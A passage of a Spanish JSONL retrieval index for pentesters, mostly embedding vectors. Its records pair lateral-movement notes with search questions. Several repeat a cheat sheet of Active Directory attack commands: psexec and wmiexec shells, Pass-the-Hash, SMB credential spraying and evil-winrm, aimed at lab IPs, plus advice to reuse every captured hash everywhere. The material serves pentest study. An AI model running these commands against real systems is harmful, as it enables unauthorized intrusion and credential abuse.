0.00119, -0.08286, 0.06423, 0.10183, -0.02635, 0.06976, 0.00303, -0.07916, 0.14387, 0.01311, -0.0241, 0.09354, 0.07288, -0.04762, -0.10893, 0.1724, -0.05297, 0.00508, 0.05628, -0.05694, -0.08534, 0.00697, 0.02956, -0.02429, -0.08063, -0.08132, -0.06842, 0.03116, -0.05822, -0.05886, 0.02208, -0.08862, -0.13636, 0.05375, -0.00958, -0.01789, 0.13432, -0.05782, -0.04184, 0.1649, -0.03224, 0.05665, -0.03219, 0.06502, -0.01622, 0.00351, -0.06131, -0.03618, -0.03337, -0.01835, -0.00819, 0.01426, 0.06598, 0.00557, 0.01886, 0.02718, 0.0557, -0.03902, -0.00048, -0.08477, -0.05215, 0.04113, -0.00353, -0.01648, 0.01888, 0.06714, -0.05332, 0.00461, 0.06654, -0.02294, -0.03687, 0.07721, -0.05923, 0.0454, -0.05587, -0.06932, 0.09609, -0.05729, -0.05981, -0.01387, 0.07447, 0.09838, -0.06269, 0.08009, 0.06043, -0.06671, 0.0211, -0.02996, -0.0261, -0.07269, 0.02454, -0.02115, -0.12003, 0.02708, 0.06889, -0.05401, -0.07212, -0.08716, -0.04977, 0.02864, 0.00987, 0.05097, -0.05902, 0.06617, 0.01318, -0.03727, -0.00148, -0.05167, 0.01263, 0.04676, -0.00794, -0.03886, -0.05721, 0.03921, 0.04563, -0.01569, 0.049, 0.06108, -0.0785, 0.04906, 0.07016, 0.07896, 0.02496, -0.04948, 0.06834, -0.00085, -0.04201, 0.02521, 0.0011, 0.04428, 0.02694, 0.0525, 0.03386, 0.01446, 0.07191, 0.05273, 0.01064, -0.06015, 0.05672, -0.01065, -0.00196, 0.05808, -0.0177, -0.02892, -0.04585, -0.01699, 0.04031, 0.03055, -0.00743, -0.04957, -0.05968, -0.04098, -0.00343, 0.09613, 0.02353, -0.03286, -0.01939, 0.01595, -0.08146, 0.06087, -0.04944, -0.02156, -0.00617, 0.06624, 0.04865, -0.09503, 0.05673, -0.00347]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Movimiento lateral\n\n> Saltar de una mΓ‘quina a otra con credenciales/hashes obtenidos. Paso 5-6 de la cadena de Active Directory.", "indexar": "quΓ© herramienta me ayuda a saltar entre mΓ‘quinas usando credenciales o hashes en Active Directory?", "v": [-0.02793, 0.06056, -0.13616, -0.20027, -0.09815, -0.10065, -0.16821, -0.02503, -0.06738, 0.0058, -0.11316, -0.06279, -0.08944, -0.04924, 0.10315, 0.03184, 0.08489, -0.03473, -0.07109, -0.03134, -0.005, -0.02853, -0.17119, -0.01022, -0.07397, 0.02139, -0.00692, 0.00087, -0.2436, 0.01414, 0.00815, 0.04888, -0.00206, -2e-05, -0.04889, -0.06231, -0.11654, 0.04856, 0.10354, 0.11142, -0.12831, 0.05716, -0.10515, -0.0107, 0.14684, 0.03291, -0.0034, -0.02096, -0.00156, 0.09332, -0.04935, -0.19019, -0.0952, -0.04493, 0.01515, -0.15184, 0.14091, -0.02891, -0.06224, -0.19296, -0.13455, -0.03647, -0.10268, 0.02476, -0.09442, -0.05301, 0.0919, -0.16054, -0.11919, 0.0869, -0.02743, 0.00975, 0.06797, 0.09196, 0.02623, -0.04421, 0.10566, 0.00919, 0.01354, 0.00881, 0.04317, -0.04466, 0.06169, 0.00449, 0.01958, -0.09826, 0.01701, -0.04811, 0.03139, -0.0288, 0.04361, 0.10697, -0.02303, 0.0011, 0.03641, 0.06574, 0.04004, -0.01403, 0.05673, -0.00705, 0.05294, -0.06559, -0.05994, 0.10023, -0.06059, 0.02953, 0.00945, 0.00965, -0.11477, 0.01651, 0.10877, 0.01081, 0.02302, -0.09986, -0.0139, 0.13726, -0.05075, -0.03132, -0.02454, -0.02157, 0.02941, -0.02184, 0.08048, -0.01095, 0.02529, -0.011, -0.02499, 0.09003, -0.04131, -0.06142, 0.00943, -0.00811, -0.06658, -0.03667, 0.07087, -0.01571, 0.05651, -0.09494, -0.02881, -0.07161, 0.01853, 0.00771, -0.03351, -0.11374, 0.00926, 0.00958, 0.04797, -0.03595, 0.00841, -0.03, 0.08598, -0.01428, 0.05203, 0.01684, -0.00306, 0.00639, 0.02873, 0.02196, -0.13533, 0.03834, -0.06868, -0.03014, 0.01066, 0.0259, -0.07243, 0.00772, 0.00311, -0.01028, 0.02594, 0.09611, 0.04096, -0.01705, 0.05099, 0.02261, 0.02487, -0.0271, 0.0001, 0.03666, -0.01137, -0.06059, 0.00944, -0.00128, 0.01367, -0.04392, -0.0017, -0.02781, 0.00745, -0.03993, 0.03131, 0.04258, 0.02384, 0.03762, -0.00178, -0.08816, 0.01637, 0.00061, 0.02663, -0.01991, 0.04166, -0.03557, -0.03843, 0.02989, -0.02444, -0.04279, 0.05918, 0.07254, -0.05415, -0.00047, 0.03094, -0.00502, 0.02277, 0.0218, 0.02539, 0.02175, -0.04957, 0.0409, -0.02789, 0.03742, -0.09678, -0.06177, 0.02203, -0.02452, 0.02044, 0.00551, -0.00892, 0.02416, 0.05143, 0.04245, 0.0207, 0.04019, 0.01362, -0.04207, 0.03715, -0.00339, 0.00523, -0.05668, 0.03722, -0.00441, -0.02943, -0.03131, 0.00516, 0.03454, 0.02131, -0.03025, -0.06413, 0.02612, 0.02186, -0.01532, -0.03689, -0.01036, -0.01085, 0.01346, 0.03165, -0.06745, -0.00375, 0.00876]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Movimiento lateral\n\n> Saltar de una mΓ‘quina a otra con credenciales/hashes obtenidos. Paso 5-6 de la cadena de Active Directory.", "indexar": "con quΓ© programa puedo mover lateralmente un usuario desde una mΓ‘quina a otra con sus credenciales?", "v": [-0.11608, 0.06772, -0.1101, -0.11008, -0.18046, 0.00533, -0.10245, 0.10066, -0.10969, -0.23041, -0.13202, 0.00209, 0.0833, -0.00728, 0.04806, 0.03497, 0.12603, -0.02043, 0.03664, 0.05626, 0.01894, -0.09953, 0.01016, -0.11536, 0.03265, 0.08327, 0.08419, -0.06507, -0.1181, -0.04228, -0.05815, 0.08684, 0.09629, -0.06991, 0.04656, -0.01968, -0.00222, 0.04427, 0.08503, 0.0965, 0.00816, 0.00745, -0.11916, 0.06039, 0.11074, 0.02812, -0.04708, -0.03397, -0.01215, -0.02661, 0.04769, -0.10121, -0.03369, -0.03886, 0.04773, -0.08341, 0.11993, -0.11217, 0.00465, -0.04616, -0.01673, 0.12498, -0.08545, 0.07448, -0.02296, -0.04134, 0.02597, -0.10495, -0.08362, -0.02579, -0.04806, -0.02165, -0.02237, 0.0079, 0.02375, 0.08538, 0.02308, -0.01829, 0.09577, -0.00864, -0.00745, 0.05615, -0.0147, 0.02714, 0.00949, -0.02075, 0.06564, -0.07708, 0.03197, 0.03943, 0.105, 0.10983, -0.01494, 0.03937, 0.09309, 0.04413, 0.04943, 0.00312, -0.04622, -0.01084, 0.12367, -0.04564, -0.02375, 0.1227, -0.05927, 0.02348, 0.12241, -0.03608, -0.0537, -0.02581, 0.10008, 0.03966, -0.06721, -0.05578, -0.10324, 0.05221, -0.15086, -0.0024, -0.0049, -0.04436, -0.00054, -0.02084, 0.05856, -0.07583, 0.07921, -0.05859, -0.016, 0.14631, -0.11829, 0.00584, 0.00889, 0.02599, 0.0167, -0.02614, -0.02472, -0.05794, 0.03856, -0.04709, 0.01556, -0.02732, 0.07405, 0.12086, -0.02097, -0.00271, 0.03803, -0.01808, 0.04432, -0.11538, -0.00016, -0.03751, 0.06007, 0.02676, 0.077, 0.04032, -0.06073, 0.05113, 0.03582, -0.00971, -0.10942, 0.02339, -0.08714, 0.02686, -0.06029, -0.04345, 0.02555, -0.07516, -0.02392, 0.0183, 0.05711, 0.07908, -0.06447, 0.06284, 0.01041, -0.00302, 0.06431, 0.0221, -0.05465, -0.05667, 0.0128, -0.05944, -0.0268, 0.04709, 0.05158, -0.03979, -0.017, -0.03271, -0.07027, 0.05617, 0.04335, 0.03124, 0.0021, 0.05773, -0.04641, -0.01971, 0.05771, -0.03998, 0.00127, 0.0302, 0.05214, -0.03576, -0.13261, -0.01212, 0.01998, 0.0417, 0.03183, 0.10539, -0.00077, 0.00255, 0.04751, 0.07558, 0.04124, -0.02801, 0.06765, 0.00859, -0.07789, -0.01651, -0.0338, 0.04351, -0.02181, -0.00068, 0.03909, -0.0432, -0.00273, 0.02971, -0.00972, -0.04449, 0.02796, 0.04112, 0.01085, 0.06025, 0.02227, 0.00559, 0.02317, -0.0264, 0.01074, 0.00703, 0.04411, -0.03437, -0.03335, -0.06794, -0.06372, 0.03469, 0.0267, -0.10035, -0.02432, 0.01872, -0.07822, 0.02194, -0.02941, -0.00826, -0.0215, 0.02434, 0.03142, -0.10005, 0.05583, 0.09158]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Movimiento lateral\n\n> Saltar de una mΓ‘quina a otra con credenciales/hashes obtenidos. Paso 5-6 de la cadena de Active Directory.", "indexar": "existe alguna tΓ©cnica para saltar de una mΓ‘quina a otra utilizando hashes de Active Directory?", "v": [-0.01641, 0.05327, -0.15431, -0.12069, -0.15761, -0.13121, -0.14159, -0.07196, -0.03076, 0.09887, -0.07278, -0.10833, -0.04476, 0.04238, 0.17536, -0.01811, 0.08811, -0.08545, 0.00254, -0.05481, -0.0255, 0.04599, -0.17041, 0.02314, -0.04526, -0.05291, -0.05872, -0.05061, -0.28555, -0.04291, 0.00414, 0.09497, 0.02952, -0.03495, -0.01474, -0.09741, -0.04204, -0.0225, 0.11477, 0.04964, -0.12421, 0.04147, -0.13581, 0.03305, 0.1344, 0.05936, 0.04119, -0.05737, 0.05869, 0.12778, 0.03313, 0.01993, -0.10578, 0.00432, 0.00843, -0.12308, 0.0635, 0.01041, -0.07171, -0.13762, -0.05237, -0.03518, -0.09041, -0.01341, -0.09417, -0.05543, 0.08306, -0.1119, -0.08299, 0.05166, 0.02903, 0.01747, -0.00548, 0.13169, 0.04976, -0.02769, 0.0515, 0.01498, 0.02623, 0.0587, -0.04615, -0.0299, 0.04887, -0.03726, -0.09974, -0.13284, 0.04118, -0.10728, 0.08204, -0.10253, 0.05704, 0.10649, 0.00251, -0.0306, 0.09691, 0.03498, 0.08084, 0.02358, 0.03339, 0.04975, 0.0607, 0.0239, -0.01896, 0.11002, -0.00682, 0.11251, 0.05337, -0.00965, -0.02432, -0.0122, -0.00967, -0.01086, -0.05324, -0.09814, -0.03884, 0.01487, -0.0635, -0.06443, -0.05052, 0.08483, -0.03999, -0.00367, 0.11298, -0.01294, 0.02168, -0.06082, -0.03059, 0.07147, -0.03943, 0.04185, 0.07096, 0.00472, -0.03877, -0.06332, 0.0209, 0.01909, 0.11687, -0.02944, 0.01466, -0.14415, 0.01035, 0.05878, -0.06814, -0.02563, 0.0052, 0.01844, 0.06588, -0.05028, -0.07963, -0.04626, 0.04468, -0.04386, 0.02702, 0.07368, 0.03354, 0.03255, 0.02568, 0.0015, -0.10669, 0.08598, -0.03165, 0.02708, -0.05079, 0.00898, -0.11559, 0.04609, -0.0794, -0.06413, 0.00782, 0.09324, 0.01818, 0.00867, 0.01472, -0.01508, 0.04846, 0.00444, -0.0279, 0.01512, 0.01237, -0.07, 0.03201, -0.00472, 0.02632, -0.04614, 0.00893, -0.01468, -0.03395, -0.01043, 0.03335, -0.03155, 0.04024, -0.00618, -0.05343, -0.02351, -0.00164, -0.02938, 0.02783, -0.00303, 0.06115, -0.05794, -0.03488, 0.06897, -0.01428, -0.03588, 0.02325, 0.03262, -0.03579, -0.02987, -0.00701, -0.03007, 0.00243, 0.01652, -0.0036, 0.03133, -0.04679, 0.04212, -0.01518, 0.01137, -0.05642, -0.00247, -0.00366, -0.03275, 0.01863, 0.05946, -0.00749, 0.04614, 0.01589, 0.04498, 0.03621, 0.04674, -0.03389, 0.01202, 0.05188, 0.00988, 0.00515, -0.02662, 0.04233, -0.03254, -0.03187, -0.0336, 0.01909, 0.03895, 0.04395, 0.00716, -0.04662, 0.02028, -0.03146, 0.01564, -0.03203, -0.02465, 0.034, -0.03698, -0.00306, -0.01279, -0.01444, -0.00599]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Con quΓ© saltas\n```bash\nimpacket-psexec dominio/user:pass@10.10.10.20 # shell SYSTEM\nimpacket-wmiexec dominio/user:pass@10.10.10.20 # sin tocar disco\nimpacket-psexec -hashes :NTLMHASH user@10.10.10.20 # Pass-the-Hash\nnxc smb 10.10.10.0/24 -u user -p pass # ΒΏdΓ³nde valen estas creds?\nxfreerdp /u:user /p:pass /v:10.10.10.20 # RDP si hay GUI\nevil-winrm -i 10.10.10.20 -u user -p pass # WinRM (5985)\n```", "indexar": "con quΓ© puedo ejecutar comandos en otro servidor usando credenciales?", "v": [0.00908, 0.09079, -0.12383, -0.05106, 0.0271, -0.07405, 0.10469, -0.05791, -0.04084, -0.10489, -0.1904, 0.06231, -0.00076, -0.10048, 0.01541, 0.09192, 0.24774, 0.00791, 0.02604, -0.02683, 0.06712, -0.10212, 0.02994, -0.04181, -0.02935, 0.06344, 0.02879, 9e-05, -0.04473, -0.09512, -0.03587, 0.02253, 0.06032, -0.02933, 0.00226, 0.05651, -0.15658, 0.09901, -0.08032, 0.18751, -0.01195, 0.06785, -0.1421, 0.00021, 0.03993, -0.04421, 0.05745, -0.04282, 0.02971, -0.10216, 0.00077, -0.11968, -0.15989, -0.06458, -0.04003, 0.00814, 0.14111, -0.12006, 0.04856, -0.01817, -0.12241, -0.0548, 0.05485, 0.06804, 0.05623, -0.02961, -0.06343, -0.14001, -0.01999, 0.02191, -0.14182, 0.0696, -0.04224, 0.02481, 0.09817, -0.01826, -0.01416, -0.02529, 0.13169, 0.05171, -0.01627, 0.01372, -0.05766, 0.07974, -0.03439, -0.08867, -0.10079, -0.05934, 0.0244, 0.01469, 0.08441, 0.0549, -0.05414, 0.04691, 0.05204, 0.07322, 0.05959, -0.0193, 0.03015, 0.02384, 0.06906, 0.01099, -0.07781, 0.13842, 0.01612, 0.08692, 0.08217, -0.07652, 0.05844, -0.0368, 0.06701, -0.05336, -0.02157, -0.04148, -0.0453, -0.07139, -0.02026, -0.06248, 0.0441, 0.01883, -0.09059, -0.00528, 0.04575, 0.06943, 0.01669, -0.0562, -0.00492, 0.04115, -0.00871, -0.05574, -0.06592, -0.03287, 0.04091, -0.04371, -0.01427, 0.0983, 0.07621, -0.06089, -0.12785, -0.10517, 0.04865, 0.00696, -0.00433, 0.02742, 0.08411, 0.01515, 0.05832, -0.10957, -0.04628, -0.02744, 0.1132, 0.00301, -0.0918, 0.02094, -0.08508, -0.06679, 0.02958, -0.05399, -0.05076, 0.07327, 0.00158, 0.00767, -0.01207, 0.08795, 0.0099, -0.04149, -0.00641, 0.0124, 0.01005, 0.07859, -1e-05, 0.02342, -0.02141, -0.03271, 0.06746, -0.05497, -0.07365, -0.01938, 0.00634, 0.00333, 0.00116, 0.0439, -0.05171, 0.0006, -0.03447, -0.03151, -0.0466, 0.02573, -0.01101, 0.02267, 0.01605, 0.06136, 0.00163, -0.01149, 0.05493, -0.02781, 0.05211, -0.03943, -0.10326, -0.04627, -0.05139, 0.00776, 0.00518, -0.05043, 0.05206, 0.01, -0.03309, 0.10106, 0.00225, 0.05401, -0.00365, -0.01931, 0.1068, -0.02083, -0.06228, 0.00192, 0.0336, -0.01614, -0.03017, -0.05782, 0.00221, 0.02355, 0.03748, -0.01889, 0.04401, 0.01021, -0.0189, -0.04378, 0.04861, 0.03255, -0.02935, 0.02357, -0.05906, -0.0386, 0.02808, -0.01843, -0.00951, 0.00202, -0.01683, -0.07348, -0.01054, 0.05725, -0.01899, -0.09616, -0.01918, -0.04548, -0.06602, -0.01096, -0.0546, -0.02025, -0.00383, -0.00192, 0.01401, -0.07687, -0.01589, -0.02587]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Con quΓ© saltas\n```bash\nimpacket-psexec dominio/user:pass@10.10.10.20 # shell SYSTEM\nimpacket-wmiexec dominio/user:pass@10.10.10.20 # sin tocar disco\nimpacket-psexec -hashes :NTLMHASH user@10.10.10.20 # Pass-the-Hash\nnxc smb 10.10.10.0/24 -u user -p pass # ΒΏdΓ³nde valen estas creds?\nxfreerdp /u:user /p:pass /v:10.10.10.20 # RDP si hay GUI\nevil-winrm -i 10.10.10.20 -u user -p pass # WinRM (5985)\n```", "indexar": "que herramienta sirve para acceder a mΓ‘quinas remota sin tocar el disco?", "v": [0.02695, -0.07184, -0.3109, -0.14733, -0.00409, -0.09268, -0.09335, 0.09085, -0.00186, -0.0143, -0.0378, -0.08976, 0.08777, -0.06837, 0.16008, -0.02134, 0.10337, -0.02072, -0.0225, 0.02268, 0.02728, -0.04842, 0.00058, 0.01086, 0.02745, -0.05604, 0.04705, -0.03261, -0.23913, 0.04334, 0.07733, -0.01801, 0.06686, -0.12527, -0.00813, -0.18985, 0.04849, 0.01339, 0.12826, 0.04855, 0.00486, 0.02439, -0.13537, 0.00301, 0.09018, -0.04519, 0.08144, 0.05962, 0.00025, 0.10431, -0.03968, -0.08415, -0.05433, -0.06658, -0.04728, -0.17398, 0.18551, -0.03364, 0.08423, 0.00611, -0.08721, -0.00365, -0.08408, 0.01986, 0.01541, -0.01255, 0.04785, -0.12626, -0.02842, 0.07774, -0.12556, 0.01924, 0.13494, -0.04281, 0.01676, -0.03507, 0.03297, 0.01819, 0.03, -0.07833, 0.00175, -0.04781, -0.08295, -0.06108, -0.10457, -0.04321, 0.12968, 0.01609, 0.00023, -0.07255, 0.0143, 0.0682, -0.03869, 0.01922, 0.10713, 0.02268, 0.05698, 0.01302, 0.01103, -0.05627, 0.15276, 0.00203, -0.04474, -0.00545, -0.03794, 0.02888, 0.0774, -0.05846, -0.00982, 0.05079, 0.063, 0.06285, -0.01788, -0.05065, -0.03617, 0.04699, -0.03989, -0.01793, -0.04484, 0.02965, 0.01917, 0.02592, -0.00696, -0.06516, 0.01594, -0.00057, 0.013, 0.05048, -0.026, -0.04656, 0.07301, -0.0262, -0.0398, 0.05467, 0.06063, -0.01542, -0.01455, -0.12477, -0.02238, -0.04778, 0.08829, 0.12013, -0.07662, -0.07562, 0.04877, 0.01107, 0.07201, -0.01303, -0.00031, -0.0178, 0.00682, -0.02446, -0.00766, 0.05501, -0.05933, 0.02225, -0.01848, 0.01323, -0.09618, -0.01786, -0.03272, -0.04794, -0.01259, -0.01406, -0.08317, 0.03426, 0.03075, -0.0417, 0.06727, 0.04862, -0.08145, 0.00901, 0.091, 0.03474, -0.02592, -0.05061, -0.00902, -0.02324, 0.06329, -0.01924, -0.03311, -0.01515, -0.05108, -0.11447, 0.00504, 0.00658, 0.00326, -0.05083, -0.00125, 0.03018, 0.05412, -0.01154, -0.03811, -0.03781, 0.05482, 0.00036, -0.05043, 0.01238, 0.00059, 0.02499, -0.06421, -0.05959, -0.03429, -0.02184, 0.07724, 0.08, -0.01247, -0.03172, -0.02278, 0.00112, 0.04166, -0.01498, -0.02112, 0.00278, 0.00803, -0.02911, -0.00952, 0.02671, -0.04258, 0.04344, -0.00269, -0.0217, 0.069, -0.01701, -0.01814, 0.05973, 0.06414, 0.03116, 0.09396, -0.02083, 0.03826, 0.00864, 0.00858, 0.03218, -0.01069, -0.03359, 0.03424, -0.04795, -0.06175, -0.02795, -0.01476, 0.0428, 0.00087, -0.06999, -0.04498, -0.04199, -0.02495, -0.03722, -0.06137, -0.04037, -0.03061, -0.00267, 0.04015, -0.01455, 0.03022, 0.06786]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Con quΓ© saltas\n```bash\nimpacket-psexec dominio/user:pass@10.10.10.20 # shell SYSTEM\nimpacket-wmiexec dominio/user:pass@10.10.10.20 # sin tocar disco\nimpacket-psexec -hashes :NTLMHASH user@10.10.10.20 # Pass-the-Hash\nnxc smb 10.10.10.0/24 -u user -p pass # ΒΏdΓ³nde valen estas creds?\nxfreerdp /u:user /p:pass /v:10.10.10.20 # RDP si hay GUI\nevil-winrm -i 10.10.10.20 -u user -p pass # WinRM (5985)\n```", "indexar": "cual es una alternativa libre a impacket-psexec para el ataque Pass-the-Hash?", "v": [-0.18457, -0.07312, -0.16042, -0.01544, -0.14455, -0.09098, 0.03549, -0.06977, -0.06054, 0.11765, -0.01834, -0.06132, -0.14219, 0.09356, 0.08975, -0.03435, 0.02283, 0.08649, 0.08974, -0.04529, -0.06051, 0.02964, -0.16515, -0.01294, -0.00457, 0.0664, -0.03928, 0.1668, -0.21879, -0.08488, -0.02997, -0.0656, -0.05754, 0.0021, 0.03995, -0.05295, 0.05336, 0.05379, 0.19226, 0.08073, 0.0496, -0.00626, -0.21313, 0.10407, -0.04066, -0.08198, 0.00328, 0.1084, 0.14427, -0.06701, 0.05261, 0.01266, -0.17993, 0.02386, 0.08913, -0.00248, 0.09334, -0.04266, -0.09086, 0.03238, -0.08622, 0.10129, 0.05084, -0.0892, 0.09457, -0.01388, -0.06205, -0.04554, -0.09196, 0.03223, 0.07856, 0.03709, -0.0041, -0.00109, -0.0687, 0.0301, 0.02372, 0.03171, -0.00246, 0.06997, 0.06037, -0.08095, -0.02805, -0.02683, -0.10934, 0.02977, 0.09992, -0.1526, 0.01906, 0.02464, 0.05803, 0.02116, 0.01471, 0.06117, -0.05788, -0.07262, -0.00887, -0.0591, -0.03538, -0.03143, -0.00399, -0.01283, -0.09656, 0.07173, -0.009, -0.05125, -0.02999, 0.0298, -0.01872, -0.0115, 0.05951, -0.0417, -0.0058, -0.02857, 0.07378, -0.11441, -0.05767, 0.01229, -0.02145, 0.0248, -0.05931, 0.03709, -0.01448, -0.04426, 0.00193, 0.00753, 0.03158, 0.02278, -0.05803, 0.01206, 0.0022, -0.0157, -0.01625, -0.04139, -0.06849, -0.03021, 0.05529, -0.02671, -0.07265, 0.02661, 0.01653, 0.06753, 0.00706, 0.0782, 0.04083, 0.0027, -0.0233, 1e-05, -0.07034, 0.02965, -0.02795, -0.01808, 0.05457, 0.11324, -0.05179, 0.0218, -0.04113, -0.035, -0.05098, 0.11023, 0.00616, -0.00931, -0.06735, 0.03423, -0.03029, 0.022, 0.04997, -0.06551, -0.00583, 0.05498, 0.01751, 0.02595, 0.07806, -0.01905, 0.02369, -0.11642, -0.03056, -0.1264, 0.09902, -0.04301, 0.03997, -0.03647, -0.05712, 0.01131, -0.01842, -0.07011, 0.06267, 0.03383, 0.01687, 0.01513, -0.0409, 0.02626, -0.0422, -0.04121, -0.02204, -0.04679, -0.02972, -0.06026, 0.00607, 0.01286, 0.00481, -0.01446, -0.05631, -0.03491, 0.01048, 0.01675, -0.07595, 0.01778, -0.01566, 0.08841, 0.04305, -0.01592, 0.07007, -0.03965, -0.09777, 0.0184, 0.03184, -0.00911, -0.01761, 0.01611, 0.05112, 0.02133, 0.02549, 0.03958, -0.01086, 0.00649, -0.01081, -0.01022, 0.00212, 0.01191, 0.00493, -0.01513, 0.00109, 0.01815, 0.01497, 0.01564, 0.01298, 0.02045, -0.06972, -0.04803, 0.05975, 0.04188, -0.01868, -0.02573, -0.0122, 0.02149, -0.07096, 0.0431, -0.03334, -0.07034, -0.03177, 0.04906, -0.0167, -0.00393, 0.0614, 0.05348]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Regla clave\n**Reutiliza credenciales**: cada pass/hash que pillas β†’ pruΓ©balo contra **todos** los hosts y servicios (MetodologΓ­a OSCP).", "indexar": "ΒΏcon quΓ© herramienta puedo reutilizar credenciales obtenidas en diferentes hosts?", "v": [-0.14166, 0.10323, -0.16581, 0.06953, 0.21081, -0.02576, -0.00753, -0.07276, -0.06084, -0.16017, -0.1751, 0.00087, -0.06314, 0.00268, 0.05778, 0.1881, 0.11899, -0.02845, 0.02782, -0.02854, -0.02757, -0.09453, -0.1491, -0.02898, -0.09315, -0.05189, 0.06236, -0.00548, -0.07408, 0.0296, -0.00882, 0.03249, -0.03952, -0.02667, -0.15773, 0.00383, -0.07631, 0.1195, -0.0335, 0.01148, 0.00438, 0.05957, -0.08395, -0.07538, 0.1073, 0.0224, -0.12139, 0.00328, -0.06901, 0.00053, -0.036, -0.19981, -0.15104, -0.06988, 0.0383, -0.19371, 0.13308, -0.05691, 0.0632, -0.05005, -0.06854, 0.02126, 0.00188, 0.03681, 0.05803, -0.06823, -0.04586, -0.09725, -0.11637, 0.06526, -0.05816, -0.02732, 0.1213, -0.03162, -0.016, 0.01265, 0.02813, 0.02963, 0.01409, 0.04621, 0.05517, -0.03662, -0.01467, 0.03401, 0.02219, -0.06592, 0.05168, -0.11828, -0.0088, -0.06428, -0.00871, 0.05875, 0.01705, 0.0434, -0.02511, -0.05048, 0.0488, -0.0117, -0.04381, 0.0371, 0.02674, -0.0908, -0.05518, 0.08929, 0.00536, 0.07854, -0.01524, -0.05978, -0.06486, -0.02212, 0.06951, 0.02365, -0.04913, 0.00417, -0.03325, 0.12233, -0.01727, -0.04947, 0.00034, -0.07494, 0.02336, -0.02375, 0.04142, -0.00492, 0.06543, 0.04891, -0.0607, 0.10193, -0.02689, -0.11615, -0.00842, -0.01288, -0.08576, -0.03483, 0.00124, -0.03895, 0.03391, -0.12316, -0.05764, -0.00826, 0.00357, 0.02249, -0.05608, -0.08555, 0.00414, -0.02223, 0.02058, -0.0962, -0.00504, -0.04793, 0.09522, 0.03409, 0.05273, -0.01742, -0.02587, 0.03053, 0.03177, -0.04174, -0.11604, 0.06726, -0.09685, -0.14486, 0.10236, -0.01894, 0.04241, -0.04843, 0.01219, -0.05325, 0.01023, 0.0905, 0.02694, 0.03595, -0.01296, -0.02212, 0.02852, -0.04476, -0.05536, -0.01676, -0.04838, -0.15168, -0.00369, 0.05264, -0.06668, -0.05751, 0.05442, -0.00093, -0.00189, 0.05312, -0.00424, -0.01037, 0.02305, 0.00743, 0.01138, -0.05012, 0.01308, -0.02986, 0.04243, -0.07469, 0.01415, 0.05251, -0.04069, -0.03285, 0.02794, -0.01988, 0.06702, 0.04371, -0.00836, 0.00058, 0.02304, 0.01257, 0.01703, -0.02703, 0.06107, -0.02812, -0.02652, 0.01169, -0.03003, 0.04283, -0.01347, -0.0511, 0.03052, 0.02731, 0.03996, -0.01359, 0.01289, 0.01964, 0.042, 0.04143, 0.00091, 0.03191, 0.01745, -0.00635, -0.03401, -0.0212, 0.02188, -0.0613, 0.01936, -0.00823, 0.00704, -0.02693, 0.01044, 0.0224, 0.00306, -0.02697, -0.04767, 0.01453, 0.00257, 0.00961, -0.03671, -0.02903, -0.04643, -0.00884, 0.02178, -0.04266, 0.01677, -0.00201]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Regla clave\n**Reutiliza credenciales**: cada pass/hash que pillas β†’ pruΓ©balo contra **todos** los hosts y servicios (MetodologΓ­a OSCP).", "indexar": "necesito una tecnica para probar un usuario con contraseΓ±a en todos los servicios a la vez", "v": [0.03585, 0.02347, -0.24741, -0.21262, 0.01159, -0.09808, -0.07736, -0.05818, -0.0085, -0.14152, -0.05524, -0.00733, -0.00724, -0.00868, -0.05089, -0.03751, 0.13549, -0.03607, 0.176, 0.07957, 0.00776, -0.08172, -0.10956, 0.00256, 0.0, -0.08611, 0.10852, -0.1638, -0.09698, -0.01964, -0.05681, -0.05338, 0.04877, -0.02378, -0.05458, 0.1172, 0.07672, -0.02674, 0.10075, 0.14165, 0.04604, 0.03004, -0.10223, 0.16076, 0.0158, 0.11872, 0.02317, -0.03957, -0.02596, 0.05578, -0.00348, -0.13222, -0.11559, -0.07007, -0.07134, -0.098, 0.14185, -0.06332, -0.03556, -0.04525, -0.08344, -0.06523, 0.08887, 0.14242, -0.04853, -0.12033, 0.01564, -0.00407, -0.07105, 0.0787, -0.03178, 0.02565, -0.0923, -0.0152, -0.02743, 0.01289, 0.03148, 0.00165, 0.03974, 0.04498, -0.08209, 0.03858, -0.02693, -0.0761, -0.15082, -0.03755, 0.08354, 0.01595, 0.08934, -0.1009, 0.12927, -0.01799, -0.00299, -0.00149, 0.01196, 0.00731, 0.05017, -0.01084, -0.0341, -0.08639, 0.06117, 0.01182, -0.04227, 0.12659, -0.06963, -0.04208, 0.03812, -0.04005, 0.00844, -0.07619, 0.00356, -0.02205, -0.09143, -0.02002, -0.03849, -0.04424, -0.06613, -0.16365, -0.05456, 0.00994, -0.01496, -0.04244, 0.06012, 0.00634, 0.0626, -0.00718, 0.00597, 0.01197, 0.00625, -0.02501, -0.00152, -0.00821, -0.06984, 0.05517, 0.03167, 0.0938, 0.0092, -0.12647, -0.10882, 0.01915, 0.01507, 0.04626, -0.01322, -0.05092, 0.03326, 0.01051, 0.03648, -0.04013, -0.10557, 0.0423, -0.01905, -0.00228, -0.00961, 0.04893, -0.06418, 